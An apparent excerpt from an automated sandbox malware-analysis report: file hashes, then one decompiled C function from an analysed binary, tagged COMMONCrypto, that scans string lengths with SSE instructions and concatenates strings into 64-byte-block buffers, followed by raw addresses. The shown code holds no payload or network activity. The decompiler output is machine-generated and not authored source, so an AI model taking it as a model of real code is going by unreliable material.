Opcode ID: 0e37b628d0b4e674bacbd8cf169e758a79634cf178c09426afabd7f642685cea
Instruction ID: 1b90e2c54bedc30fe6d47a31e48b0408657c5a932b20ef7ac1fa36f34cc4f8aa
Opcode Fuzzy Hash: 0e37b628d0b4e674bacbd8cf169e758a79634cf178c09426afabd7f642685cea
Instruction Fuzzy Hash: 7D21A431608301ABC744DFA8CA94A6F77E9AFC4354F104F2CF6655B2B0EB30D8019B92

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E7A7660, Relevance: 4.5, Strings: 3, Instructions: 793
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E6E7A7660(intOrPtr* __ecx, signed int* _a4, signed int _a8) {
				signed int _v32;
				intOrPtr* _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _t203;
				signed int _t206;
				signed int* _t207;
				signed int* _t216;
				signed int _t217;
				signed int _t219;
				signed int _t221;
				signed int _t222;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int* _t234;
				signed int _t236;
				signed int _t237;
				signed int _t239;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int* _t248;
				signed int _t250;
				signed int _t251;
				signed int _t259;
				signed int _t262;
				void* _t264;
				signed int _t265;
				signed int _t266;
				signed int* _t269;
				signed int _t271;
				signed int _t272;
				signed int _t275;
				signed int _t280;
				signed int* _t281;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t294;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t308;
				signed int _t309;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int* _t316;
				signed int _t324;
				signed int _t326;
				unsigned int _t331;
				signed int _t333;
				signed int* _t335;
				signed int _t337;
				signed int* _t339;
				char _t340;
				char _t341;
				signed int _t343;
				intOrPtr* _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t349;
				void* _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				unsigned int _t372;
				signed int _t374;
				signed int* _t376;
				signed int _t377;
				signed int _t378;
				intOrPtr* _t380;
				intOrPtr* _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				intOrPtr* _t386;
				void* _t387;
				signed int _t388;
				intOrPtr* _t390;
				unsigned int _t396;
				signed int _t398;
				void* _t399;
				signed int _t400;
				signed int _t401;
				intOrPtr _t402;
				signed int _t403;
				signed int _t404;
				signed int _t407;
				signed int _t414;
				signed int _t415;
				signed int _t422;
				signed int _t428;
				signed int _t429;
				unsigned int _t434;
				signed int _t437;
				void* _t439;
				void* _t441;

				_t439 = (_t437 & 0xfffffff0) - 0x34;
				_t390 = __ecx;
				_t303 =  *__ecx;
				if(_t303 != 0) {
					_t343 =  *( *( *(__ecx + 4)));
					__eflags = _t343;
					if(_t343 == 0) {
						L35:
						_push(0x40);
						_t284 = E6E791030();
						_t439 = _t439 + 4;
						__eflags =  *_t390 - 1;
						 *_t284 = 0;
						if( *_t390 <= 1) {
							goto L203;
						} else {
							_t415 = 0x40;
							goto L37;
						}
					} else {
						__eflags =  *_t343;
						if( *_t343 == 0) {
							goto L35;
						} else {
							_t262 = _t343 & 0x0000000f;
							__eflags = _t262;
							if(_t262 == 0) {
								L16:
								asm("pxor xmm0, xmm0");
								_t294 =  ~( ~_t262 + 0x0000000f & 0x0000000f) + 0x7fffffff;
								__eflags = _t294;
								_v64 = _t294;
								_t429 = _t294;
								while(1) {
									asm("movdqu xmm1, [edx+eax]");
									asm("pcmpeqb xmm1, xmm0");
									asm("pmovmskb ebx, xmm1");
									__eflags = _t294;
									if(_t294 != 0) {
										break;
									}
									_t262 = _t262 + 0x10;
									__eflags = _t262 - _t429;
									if(_t262 < _t429) {
										continue;
									} else {
										_v64 = _t429;
										__eflags = _v64 - 0x7fffffff;
										if(_v64 >= 0x7fffffff) {
											L23:
											_v64 = 0x7fffffff;
										} else {
											_t275 = _t429;
											while(1) {
												__eflags =  *((char*)(_t275 + _t343));
												if( *((char*)(_t275 + _t343)) == 0) {
													break;
												}
												_t275 = _t275 + 1;
												__eflags = _t275 - 0x7fffffff;
												if(_t275 < 0x7fffffff) {
													continue;
												} else {
													goto L23;
												}
												goto L24;
											}
											_v64 = _t275;
										}
									}
									goto L24;
								}
								asm("bsf ebx, ebx");
								_v64 = _t294 + _t262;
							} else {
								_v64 = 0;
								_t299 = _v64;
								_t262 =  ~_t262 + 0x10;
								__eflags = _t262;
								while(1) {
									__eflags =  *((char*)(_t299 + _t343));
									if( *((char*)(_t299 + _t343)) == 0) {
										break;
									}
									_t299 = _t299 + 1;
									__eflags = _t299 - _t262;
									if(_t299 < _t262) {
										continue;
									} else {
										goto L16;
									}
									goto L24;
								}
								_v64 = _t299;
							}
							L24:
							_t264 = _v64 + 1;
							__eflags = _t264 - 0x40;
							_t265 =  <=  ? 0x40 : _t264;
							__eflags = _t265;
							if(_t265 > 0) {
								_t434 = (_t265 >> 5 >> 0x1a) + _t265 >> 6;
								_t266 = _t265 & 0x8000003f;
								__eflags = _t266;
								if(_t266 < 0) {
									_t266 = (_t266 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t266;
								}
								__eflags = _t266;
								_t415 = _t434 + (0 | _t266 > 0x00000000) << 6;
								_push(_t415);
								_v68 = _t343;
								_t269 = E6E791030();
								_t385 = _v68;
								_t339 = _t269;
								_t439 = _t439 + 4;
								_v60 = 0;
								_v44 = _t339;
								_v36 = _t390;
								 *_t339 = 0;
								_v68 =  *_t390;
								_t298 = _v60;
								_t404 = _v64;
								while(1) {
									_t271 =  *_t385;
									_t298 = _t298 + 1;
									 *_t339 = _t271;
									__eflags = _t404;
									if(_t404 == 0) {
										goto L33;
									}
									__eflags = _t298 - _t404;
									if(_t298 == _t404) {
										_t284 = _v44;
										_t272 = _v68;
										_t390 = _v36;
										_t339[0] = 0;
									} else {
										goto L33;
									}
									L206:
									__eflags = _t272 - 1;
									if(_t272 > 1) {
										goto L37;
									} else {
										goto L157;
									}
									goto L200;
									L33:
									__eflags = _t271;
									if(_t271 == 0) {
										_t284 = _v44;
										_t272 = _v68;
										_t390 = _v36;
									} else {
										_t339 =  &(_t339[0]);
										_t385 = _t385 + 1;
										__eflags = _t385;
										continue;
									}
									goto L206;
								}
							} else {
								_t284 = 0;
								__eflags = _t303 - 1;
								if(_t303 <= 1) {
									L203:
									_t344 = _a4;
									_t203 = 0;
									 *_t344 = 0;
									 *((intOrPtr*)(_t344 + 4)) = 0;
									__eflags = _t284;
									if(_t284 == 0) {
										goto L191;
									} else {
										goto L158;
									}
								} else {
									_t415 = 0;
									L37:
									_t36 =  &_a8; // 0x6e7b3877
									_t308 =  *_t36 & 0x0000000f;
									asm("pxor xmm0, xmm0");
									_t359 =  ~_t308 + 0x10;
									__eflags = _t359;
									_v52 = _t359;
									_v56 = _t308;
									_v48 = _t415;
									_v36 = _t390;
									_t400 = 1;
									goto L38;
									do {
										do {
											do {
												L38:
												__eflags = _a8;
												if(_a8 != 0) {
													_t363 = _a8;
													__eflags =  *_t363;
													if( *_t363 != 0) {
														__eflags = _t284 - _a8;
														if(_t284 != _a8) {
															_t229 = _v56;
															__eflags = _t229;
															if(_t229 == 0) {
																L46:
																asm("pxor xmm1, xmm1");
																_t422 =  ~( ~_t229 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																__eflags = _t422;
																while(1) {
																	asm("movdqu xmm0, [ecx+eax]");
																	asm("pcmpeqb xmm0, xmm1");
																	asm("pmovmskb edx, xmm0");
																	__eflags = _t363;
																	if(_t363 != 0) {
																		break;
																	}
																	_t229 = _t229 + 0x10;
																	__eflags = _t229 - _t422;
																	if(_t229 < _t422) {
																		continue;
																	} else {
																		__eflags = _t422 - 0x7fffffff;
																		if(_t422 >= 0x7fffffff) {
																			L53:
																			_t422 = 0x7fffffff;
																		} else {
																			_t363 = _a8;
																			while(1) {
																				__eflags =  *((char*)(_t422 + _t363));
																				if( *((char*)(_t422 + _t363)) == 0) {
																					goto L54;
																				}
																				_t422 = _t422 + 1;
																				__eflags = _t422 - 0x7fffffff;
																				if(_t422 < 0x7fffffff) {
																					continue;
																				} else {
																					goto L53;
																				}
																				goto L54;
																			}
																		}
																	}
																	goto L54;
																}
																asm("bsf esi, edx");
																_t422 = _t422 + _t229;
															} else {
																_t229 = _v52;
																_t422 = 0;
																__eflags = 0;
																_t324 = _a8;
																_t363 = _t229;
																while(1) {
																	__eflags =  *((char*)(_t422 + _t324));
																	if( *((char*)(_t422 + _t324)) == 0) {
																		break;
																	}
																	_t422 = _t422 + 1;
																	__eflags = _t422 - _t363;
																	if(_t422 < _t363) {
																		continue;
																	} else {
																		_v52 = _t363;
																		goto L46;
																	}
																	goto L54;
																}
																_v52 = _t363;
															}
															L54:
															__eflags = _t284;
															if(_t284 == 0) {
																_t311 = 0;
															} else {
																_t239 = _t284 & 0x0000000f;
																__eflags = _t239;
																if(_t239 == 0) {
																	L59:
																	asm("pxor xmm1, xmm1");
																	_t311 =  ~( ~_t239 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																	__eflags = _t311;
																	while(1) {
																		asm("movdqu xmm0, [ebx+eax]");
																		asm("pcmpeqb xmm0, xmm1");
																		asm("pmovmskb edx, xmm0");
																		__eflags = _t363;
																		if(_t363 != 0) {
																			break;
																		}
																		_t239 = _t239 + 0x10;
																		__eflags = _t239 - _t311;
																		if(_t239 < _t311) {
																			continue;
																		} else {
																			__eflags = _t311 - 0x7fffffff;
																			if(_t311 >= 0x7fffffff) {
																				L65:
																				_t311 = 0x7fffffff;
																			} else {
																				while(1) {
																					__eflags =  *((char*)(_t311 + _t284));
																					if( *((char*)(_t311 + _t284)) == 0) {
																						goto L66;
																					}
																					_t311 = _t311 + 1;
																					__eflags = _t311 - 0x7fffffff;
																					if(_t311 < 0x7fffffff) {
																						continue;
																					} else {
																						goto L65;
																					}
																					goto L66;
																				}
																			}
																		}
																		goto L66;
																	}
																	asm("bsf ecx, edx");
																	_t311 = _t311 + _t239;
																} else {
																	_t311 = 0;
																	_t239 =  ~_t239 + 0x10;
																	__eflags = _t239;
																	while(1) {
																		__eflags =  *((char*)(_t311 + _t284));
																		if( *((char*)(_t311 + _t284)) == 0) {
																			goto L66;
																		}
																		_t311 = _t311 + 1;
																		__eflags = _t311 - _t239;
																		if(_t311 < _t239) {
																			continue;
																		} else {
																			goto L59;
																		}
																		goto L66;
																	}
																}
															}
															L66:
															_t55 = _t311 + 1; // 0x80000000
															_t312 = _t422 + _t55;
															__eflags = _t312;
															if(_t312 != 0) {
																__eflags = _t312 - 0x40;
																_t313 =  <=  ? 0x40 : _t312;
																__eflags = _t313 - _v48;
																if(_t313 > _v48) {
																	goto L71;
																}
																goto L83;
															} else {
																__eflags = _t284;
																if(_t284 == 0) {
																	__eflags = _v48 - 0x40;
																	if(_v48 >= 0x40) {
																		goto L97;
																	} else {
																		goto L213;
																	}
																	goto L225;
																} else {
																	 *_t284 = 0;
																	_t365 = 0;
																	__eflags = _v48 - 0x40;
																	if(_v48 < 0x40) {
																		L213:
																		_t313 = 0x40;
																		L71:
																		_t372 = (_t313 >> 5 >> 0x1a) + _t313 >> 6;
																		_v48 = _t372;
																		_t315 = _t313 & 0x8000003f;
																		__eflags = _t315;
																		if(_t315 < 0) {
																			_t315 = (_t315 - 0x00000001 | 0xffffffc0) + 1;
																			__eflags = _t315;
																		}
																		__eflags = _t315;
																		_t374 = _t372 + (0 | _t315 > 0x00000000) << 6;
																		_v48 = _t374;
																		_push(_t374);
																		_t234 = E6E791030();
																		_v68 = _t234;
																		_t439 = _t439 + 4;
																		__eflags = _t284;
																		if(_t284 == 0) {
																			 *_t234 = 0;
																		} else {
																			__eflags = _v68;
																			if(_v68 != 0) {
																				_t376 = _t234;
																				_t236 =  *_t284;
																				 *_t376 = _t236;
																				__eflags = _t236;
																				if(_t236 != 0) {
																					_v32 = _t400;
																					_t237 = 0;
																					__eflags = 0;
																					_t316 = _t376;
																					while(1) {
																						_t237 = _t237 + 1;
																						_t377 =  *((char*)(_t284 + _t237 * 2 - 1));
																						 *(_t316 + _t237 * 2 - 1) = _t377;
																						__eflags = _t377;
																						if(_t377 == 0) {
																							break;
																						}
																						_t378 =  *((char*)(_t284 + _t237 * 2));
																						 *(_t316 + _t237 * 2) = _t378;
																						__eflags = _t378;
																						if(_t378 != 0) {
																							continue;
																						}
																						break;
																					}
																					_t400 = _v32;
																				}
																			}
																			_push(1);
																			_push(_t284);
																			E6E7910B0();
																			_t439 = _t439 + 8;
																		}
																		_t284 = _v68;
																		L83:
																		_t314 = _t284;
																		__eflags = _t284;
																		if(_t284 != 0) {
																			_t365 =  *_t284;
																			goto L85;
																		}
																	} else {
																		_t314 = _t284;
																		L85:
																		__eflags = _t365;
																		if(_t365 != 0) {
																			_t367 = 0;
																			__eflags = 0;
																			while(1) {
																				_t367 = _t367 + 1;
																				_t231 = _t284 + _t367 * 2;
																				__eflags =  *(_t231 - 1);
																				_t78 = _t231 - 1; // -1
																				_t314 = _t78;
																				if( *(_t231 - 1) == 0) {
																					goto L89;
																				}
																				_t314 = _t231;
																				__eflags =  *_t231;
																				if( *_t231 != 0) {
																					continue;
																				}
																				goto L89;
																			}
																		}
																		L89:
																		_t366 = _t314;
																		__eflags = _t422;
																		if(__eflags != 0) {
																			if(__eflags > 0) {
																				goto L92;
																			}
																		} else {
																			_t422 = 0x7fffffff;
																			L92:
																			_v32 = _t400;
																			_t230 = 0;
																			__eflags = 0;
																			_v44 = _t284;
																			_t401 = _a8;
																			while(1) {
																				_t287 =  *((char*)(_t230 + _t401));
																				 *(_t230 + _t366) = _t287;
																				__eflags = _t287;
																				if(_t287 == 0) {
																					break;
																				}
																				_t85 = _t366 + 1; // 0x1
																				_t314 = _t230 + _t85;
																				_t230 = _t230 + 1;
																				__eflags = _t230 - _t422;
																				if(_t230 < _t422) {
																					continue;
																				}
																				break;
																			}
																			_t400 = _v32;
																			_t284 = _v44;
																		}
																		 *_t314 = 0;
																	}
																}
															}
														}
													}
												}
												L97:
												_t309 =  *(_v36 + 4);
												_t361 =  *( *(_t309 + _t400 * 4));
												__eflags = _t361;
												if(_t361 == 0) {
													goto L99;
												} else {
													__eflags =  *_t361;
													if( *_t361 != 0) {
														__eflags = _t361 - _t284;
														if(_t361 == _t284) {
															goto L99;
														} else {
															_t225 = _t361 & 0x0000000f;
															__eflags = _t225;
															if(_t225 == 0) {
																L106:
																asm("pxor xmm1, xmm1");
																_t428 =  ~( ~_t225 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																__eflags = _t428;
																while(1) {
																	asm("movdqu xmm0, [edx+eax]");
																	asm("pcmpeqb xmm0, xmm1");
																	asm("pmovmskb ecx, xmm0");
																	__eflags = _t309;
																	if(_t309 != 0) {
																		break;
																	}
																	_t225 = _t225 + 0x10;
																	__eflags = _t225 - _t428;
																	if(_t225 < _t428) {
																		continue;
																	} else {
																		__eflags = _t428 - 0x7fffffff;
																		if(_t428 >= 0x7fffffff) {
																			L112:
																			_t428 = 0x7fffffff;
																		} else {
																			while(1) {
																				__eflags =  *((char*)(_t428 + _t361));
																				if( *((char*)(_t428 + _t361)) == 0) {
																					goto L113;
																				}
																				_t428 = _t428 + 1;
																				__eflags = _t428 - 0x7fffffff;
																				if(_t428 < 0x7fffffff) {
																					continue;
																				} else {
																					goto L112;
																				}
																				goto L113;
																			}
																		}
																	}
																	goto L113;
																}
																asm("bsf esi, ecx");
																_t428 = _t428 + _t225;
															} else {
																_t428 = 0;
																_t225 =  ~_t225 + 0x10;
																__eflags = _t225;
																while(1) {
																	__eflags =  *((char*)(_t428 + _t361));
																	if( *((char*)(_t428 + _t361)) == 0) {
																		goto L113;
																	}
																	_t428 = _t428 + 1;
																	__eflags = _t428 - _t225;
																	if(_t428 < _t225) {
																		continue;
																	} else {
																		goto L106;
																	}
																	goto L113;
																}
															}
															L113:
															__eflags = _t284;
															if(_t284 == 0) {
																_t226 = 0;
															} else {
																_t337 = _t284 & 0x0000000f;
																__eflags = _t337;
																if(_t337 == 0) {
																	L118:
																	asm("pxor xmm1, xmm1");
																	_v32 = _t400;
																	_t226 =  ~( ~_t337 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																	__eflags = _t226;
																	while(1) {
																		asm("movdqu xmm0, [ebx+ecx]");
																		asm("pcmpeqb xmm0, xmm1");
																		asm("pmovmskb edi, xmm0");
																		__eflags = _t400;
																		if(_t400 != 0) {
																			break;
																		}
																		_t337 = _t337 + 0x10;
																		__eflags = _t337 - _t226;
																		if(_t337 < _t226) {
																			continue;
																		} else {
																			_t400 = _v32;
																			__eflags = _t226 - 0x7fffffff;
																			if(_t226 >= 0x7fffffff) {
																				L124:
																				_t226 = 0x7fffffff;
																			} else {
																				while(1) {
																					__eflags =  *((char*)(_t226 + _t284));
																					if( *((char*)(_t226 + _t284)) == 0) {
																						goto L125;
																					}
																					_t226 = _t226 + 1;
																					__eflags = _t226 - 0x7fffffff;
																					if(_t226 < 0x7fffffff) {
																						continue;
																					} else {
																						goto L124;
																					}
																					goto L125;
																				}
																			}
																		}
																		goto L125;
																	}
																	_t259 = _t400;
																	asm("bsf eax, eax");
																	_t400 = _v32;
																	_t226 = _t259 + _t337;
																} else {
																	_t226 = 0;
																	_t337 =  ~_t337 + 0x10;
																	__eflags = _t337;
																	while(1) {
																		__eflags =  *((char*)(_t226 + _t284));
																		if( *((char*)(_t226 + _t284)) == 0) {
																			goto L125;
																		}
																		_t226 = _t226 + 1;
																		__eflags = _t226 - _t337;
																		if(_t226 < _t337) {
																			continue;
																		} else {
																			goto L118;
																		}
																		goto L125;
																	}
																}
															}
															L125:
															_t100 = _t226 + 1; // 0x80000000
															_t227 = _t428 + _t100;
															__eflags = _t227;
															if(_t227 != 0) {
																__eflags = _t227 - 0x40;
																_t228 =  <=  ? 0x40 : _t227;
																__eflags = _t228 - _v48;
																if(_t228 > _v48) {
																	goto L130;
																}
																goto L142;
															} else {
																__eflags = _t284;
																if(_t284 == 0) {
																	__eflags = _v48 - 0x40;
																	if(_v48 >= 0x40) {
																		goto L214;
																	} else {
																		goto L224;
																	}
																} else {
																	 *_t284 = 0;
																	_t242 = 0;
																	__eflags = _v48 - 0x40;
																	if(_v48 < 0x40) {
																		L224:
																		_t228 = 0x40;
																		L130:
																		_t331 = (_t228 >> 5 >> 0x1a) + _t228 >> 6;
																		_v48 = _t331;
																		_t245 = _t228 & 0x8000003f;
																		__eflags = _t245;
																		if(_t245 < 0) {
																			_t245 = (_t245 - 0x00000001 | 0xffffffc0) + 1;
																			__eflags = _t245;
																		}
																		__eflags = _t245;
																		_t333 = _t331 + (0 | _t245 > 0x00000000) << 6;
																		_v48 = _t333;
																		_push(_t333);
																		_v64 = _t361;
																		_t248 = E6E791030();
																		_t361 = _v64;
																		_v60 = _t248;
																		_t439 = _t439 + 4;
																		__eflags = _t284;
																		if(_t284 == 0) {
																			 *_t248 = 0;
																		} else {
																			__eflags = _v60;
																			if(_v60 != 0) {
																				_t335 = _t248;
																				_t250 =  *_t284;
																				 *_t335 = _t250;
																				__eflags = _t250;
																				if(_t250 != 0) {
																					_v64 = _t361;
																					_t251 = 0;
																					__eflags = 0;
																					_v32 = _t400;
																					while(1) {
																						_t251 = _t251 + 1;
																						_t383 =  *((char*)(_t284 + _t251 * 2 - 1));
																						 *(_t335 + _t251 * 2 - 1) = _t383;
																						__eflags = _t383;
																						if(_t383 == 0) {
																							break;
																						}
																						_t384 =  *((char*)(_t284 + _t251 * 2));
																						 *(_t335 + _t251 * 2) = _t384;
																						__eflags = _t384;
																						if(_t384 != 0) {
																							continue;
																						}
																						break;
																					}
																					_t361 = _v64;
																					_t400 = _v32;
																				}
																			}
																			_push(1);
																			_push(_t284);
																			_v64 = _t361;
																			E6E7910B0();
																			_t361 = _v64;
																			_t439 = _t439 + 8;
																		}
																		_t284 = _v60;
																		L142:
																		_t326 = _t284;
																		__eflags = _t284;
																		if(_t284 == 0) {
																			goto L214;
																		} else {
																			_t242 =  *_t284;
																			goto L144;
																		}
																	} else {
																		_t326 = _t284;
																		L144:
																		__eflags = _t242;
																		if(_t242 != 0) {
																			_v32 = _t400;
																			_t244 = 0;
																			__eflags = 0;
																			while(1) {
																				_t244 = _t244 + 1;
																				_t403 = _t284 + _t244 * 2;
																				__eflags =  *(_t403 - 1);
																				_t326 = _t403 - 1;
																				if( *(_t403 - 1) == 0) {
																					break;
																				}
																				_t326 = _t403;
																				__eflags =  *_t403;
																				if( *_t403 != 0) {
																					continue;
																				}
																				break;
																			}
																			_t400 = _v32;
																		}
																		_t243 = _t326;
																		__eflags = _t428;
																		if(__eflags != 0) {
																			if(__eflags > 0) {
																				goto L152;
																			}
																		} else {
																			_t428 = 0x7fffffff;
																			L152:
																			_v40 = 0;
																			_v32 = _t400;
																			_v44 = _t284;
																			_t402 = _v40;
																			while(1) {
																				_t288 =  *((char*)(_t402 + _t361));
																				 *(_t402 + _t243) = _t288;
																				__eflags = _t288;
																				if(_t288 == 0) {
																					break;
																				}
																				_t141 = _t243 + 1; // 0x1
																				_t326 = _t402 + _t141;
																				_t402 = _t402 + 1;
																				__eflags = _t402 - _t428;
																				if(_t402 < _t428) {
																					continue;
																				}
																				break;
																			}
																			_t400 = _v32;
																			_t284 = _v44;
																		}
																		goto L156;
																	}
																}
															}
														}
													} else {
														goto L99;
													}
												}
												goto L200;
												L99:
												_t400 = _t400 + 1;
												__eflags = _t400 -  *_v36;
											} while (_t400 <  *_v36);
											goto L203;
											L214:
											_t400 = _t400 + 1;
											__eflags = _t400 -  *_v36;
										} while (_t400 <  *_v36);
										_t380 = _a4;
										 *_t380 = 0;
										 *((intOrPtr*)(_t380 + 4)) = 0;
										L191:
										_push(0x40);
										_t407 = E6E791030();
										_t439 = _t439 + 4;
										_t206 =  *_a4;
										__eflags = _t206;
										if(_t206 == 0) {
											 *_t407 = 0;
										} else {
											__eflags = _t407;
											if(_t407 != 0) {
												_t345 =  *_t206;
												 *_t407 = _t345;
												__eflags = _t345;
												if(_t345 != 0) {
													_t304 = 0;
													__eflags = 0;
													while(1) {
														_t304 = _t304 + 1;
														_t346 =  *((char*)(_t206 + _t304 * 2 - 1));
														 *(_t407 + _t304 * 2 - 1) = _t346;
														__eflags = _t346;
														if(_t346 == 0) {
															goto L197;
														}
														_t347 =  *((char*)(_t206 + _t304 * 2));
														 *(_t407 + _t304 * 2) = _t347;
														__eflags = _t347;
														if(_t347 != 0) {
															continue;
														}
														goto L197;
													}
												}
											}
											L197:
											_push(1);
											_push(_t206);
											E6E7910B0();
											_t439 = _t439 + 8;
										}
										_t207 = _a4;
										 *_t207 = _t407;
										_t207[1] = 0x40;
										goto L200;
										L156:
										_t400 = _t400 + 1;
										 *_t326 = 0;
										__eflags = _t400 -  *_v36;
									} while (_t400 <  *_v36);
									L157:
									_t382 = _a4;
									_t203 = 0;
									__eflags = 0;
									 *_t382 = 0;
									 *((intOrPtr*)(_t382 + 4)) = 0;
									L158:
									__eflags =  *_t284;
									if( *_t284 == 0) {
										goto L191;
									} else {
										_t349 = _t284 & 0x0000000f;
										__eflags = _t349;
										if(_t349 == 0) {
											L163:
											asm("pxor xmm0, xmm0");
											_t414 =  ~( ~_t349 + 0x0000000f & 0x0000000f) + 0x7fffffff;
											__eflags = _t414;
											while(1) {
												asm("movdqu xmm1, [ebx+edx]");
												asm("pcmpeqb xmm1, xmm0");
												asm("pmovmskb eax, xmm1");
												__eflags = _t203;
												if(_t203 != 0) {
													break;
												}
												_t349 = _t349 + 0x10;
												__eflags = _t349 - _t414;
												if(_t349 < _t414) {
													continue;
												} else {
													__eflags = _t414 - 0x7fffffff;
													if(_t414 >= 0x7fffffff) {
														L169:
														_t414 = 0x7fffffff;
													} else {
														while(1) {
															__eflags =  *((char*)(_t414 + _t284));
															if( *((char*)(_t414 + _t284)) == 0) {
																goto L170;
															}
															_t414 = _t414 + 1;
															__eflags = _t414 - 0x7fffffff;
															if(_t414 < 0x7fffffff) {
																continue;
															} else {
																goto L169;
															}
															goto L170;
														}
													}
												}
												goto L170;
											}
											asm("bsf esi, eax");
											_t414 = _t414 + _t349;
										} else {
											_t414 = 0;
											_t349 =  ~_t349 + 0x10;
											__eflags = _t349;
											while(1) {
												__eflags =  *((char*)(_t414 + _t284));
												if( *((char*)(_t414 + _t284)) == 0) {
													goto L170;
												}
												_t414 = _t414 + 1;
												__eflags = _t414 - _t349;
												if(_t414 < _t349) {
													continue;
												} else {
													goto L163;
												}
												goto L170;
											}
										}
										L170:
										_t149 = _t414 + 1; // 0x80000000
										_t350 = _t149;
										__eflags = _t350 - 0x40;
										_t351 =  <=  ? 0x40 : _t350;
										__eflags = _t351;
										if(_t351 > 0) {
											_t396 = (_t351 >> 5 >> 0x1a) + _t351 >> 6;
											_t352 = _t351 & 0x8000003f;
											__eflags = _t352;
											if(_t352 < 0) {
												_t352 = (_t352 - 0x00000001 | 0xffffffc0) + 1;
												__eflags = _t352;
											}
											__eflags = _t352;
											_t398 = _t396 + (0 | _t352 > 0x00000000) << 6;
											_push(_t398);
											_t353 = E6E791030();
											_t439 = _t439 + 4;
											_t305 =  *_a4;
											__eflags = _t305;
											if(_t305 == 0) {
												 *_t353 = 0;
											} else {
												__eflags = _t353;
												if(_t353 != 0) {
													_t219 =  *_t305;
													 *_t353 = _t219;
													__eflags = _t219;
													if(_t219 != 0) {
														__eflags = 0;
														_v68 = _t414;
														_v44 = _t284;
														_t286 = 0;
														while(1) {
															_t286 = _t286 + 1;
															_t221 =  *((char*)(_t305 + _t286 * 2 - 1));
															 *(_t353 + _t286 * 2 - 1) = _t221;
															__eflags = _t221;
															if(_t221 == 0) {
																break;
															}
															_t222 =  *((char*)(_t305 + _t286 * 2));
															 *(_t353 + _t286 * 2) = _t222;
															__eflags = _t222;
															if(_t222 != 0) {
																continue;
															}
															break;
														}
														_t414 = _v68;
														_t284 = _v44;
													}
												}
												_push(1);
												_push(_t305);
												_v68 = _t353;
												E6E7910B0();
												_t353 = _v68;
												_t439 = _t439 + 8;
											}
											_t216 = _a4;
											_t216[1] = _t398;
											 *_t216 = _t353;
										} else {
											_t353 = 0;
										}
										_t306 = _t284;
										__eflags = _t353;
										if(_t353 != 0) {
											_t399 = 0;
											while(1) {
												_t217 =  *_t306;
												_t399 = _t399 + 1;
												 *_t353 = _t217;
												__eflags = _t414;
												if(_t414 == 0) {
													goto L189;
												}
												__eflags = _t399 - _t414;
												if(_t399 == _t414) {
													 *(_t353 + 1) = 0;
												} else {
													goto L189;
												}
												goto L200;
												L189:
												__eflags = _t217;
												if(_t217 != 0) {
													_t353 = _t353 + 1;
													_t306 = _t306 + 1;
													__eflags = _t306;
													continue;
												}
												goto L200;
											}
										}
									}
								}
							}
						}
					}
					L200:
					_push(1);
					_push(_t284);
					E6E7910B0();
					return _a4;
				} else {
					_t386 = _a4;
					_push(0x40);
					 *_t386 = 0;
					 *((intOrPtr*)(_t386 + 4)) = 0;
					_t300 = E6E791030();
					_t441 = _t439 + 4;
					_t280 =  *_a4;
					if(_t280 == 0) {
						 *_t300 = 0;
					} else {
						if(_t300 != 0) {
							_t387 =  *_t280;
							 *_t300 = _t387;
							if(_t387 != 0) {
								_t388 = 0;
								while(1) {
									_t388 = _t388 + 1;
									_t340 =  *((char*)(_t280 + _t388 * 2 - 1));
									 *((char*)(_t300 + _t388 * 2 - 1)) = _t340;
									if(_t340 == 0) {
										goto L7;
									}
									_t341 =  *((char*)(_t280 + _t388 * 2));
									 *((char*)(_t300 + _t388 * 2)) = _t341;
									if(_t341 != 0) {
										continue;
									}
									goto L7;
								}
							}
						}
						L7:
						_push(1);
						_push(_t280);
						E6E7910B0();
						_t441 = _t441 + 8;
					}
					_t281 = _a4;
					_t281[1] = 0x40;
					 *_t281 = _t300;
					return _t281;
				}
				L225:
			}

0x6e7a7669
0x6e7a766c
0x6e7a766e
0x6e7a7672
0x6e7a76e8
0x6e7a76ea
0x6e7a76ec
0x6e7a782b
0x6e7a782b
0x6e7a7832
0x6e7a7834
0x6e7a7837
0x6e7a783a
0x6e7a783d
0x00000000
0x6e7a7843
0x6e7a7843
0x00000000
0x6e7a7843
0x6e7a76f2
0x6e7a76f2
0x6e7a76f5
0x00000000
0x6e7a76fb
0x6e7a76fd
0x6e7a76fd
0x6e7a7700
0x6e7a7722
0x6e7a7726
0x6e7a7732
0x6e7a7732
0x6e7a7738
0x6e7a773c
0x6e7a773e
0x6e7a773e
0x6e7a7743
0x6e7a7747
0x6e7a774b
0x6e7a774d
0x00000000
0x00000000
0x6e7a7753
0x6e7a7756
0x6e7a7758
0x00000000
0x6e7a775a
0x6e7a775a
0x6e7a775e
0x6e7a7766
0x6e7a777c
0x6e7a777c
0x6e7a7768
0x6e7a7768
0x6e7a776a
0x6e7a776a
0x6e7a776e
0x00000000
0x00000000
0x6e7a7774
0x6e7a7775
0x6e7a777a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a777a
0x6e7a7f0c
0x6e7a7f0c
0x6e7a7766
0x00000000
0x6e7a7758
0x6e7a7f15
0x6e7a7f1a
0x6e7a7702
0x6e7a7702
0x6e7a770c
0x6e7a7710
0x6e7a7710
0x6e7a7713
0x6e7a7713
0x6e7a7717
0x00000000
0x00000000
0x6e7a771d
0x6e7a771e
0x6e7a7720
0x00000000
0x00000000
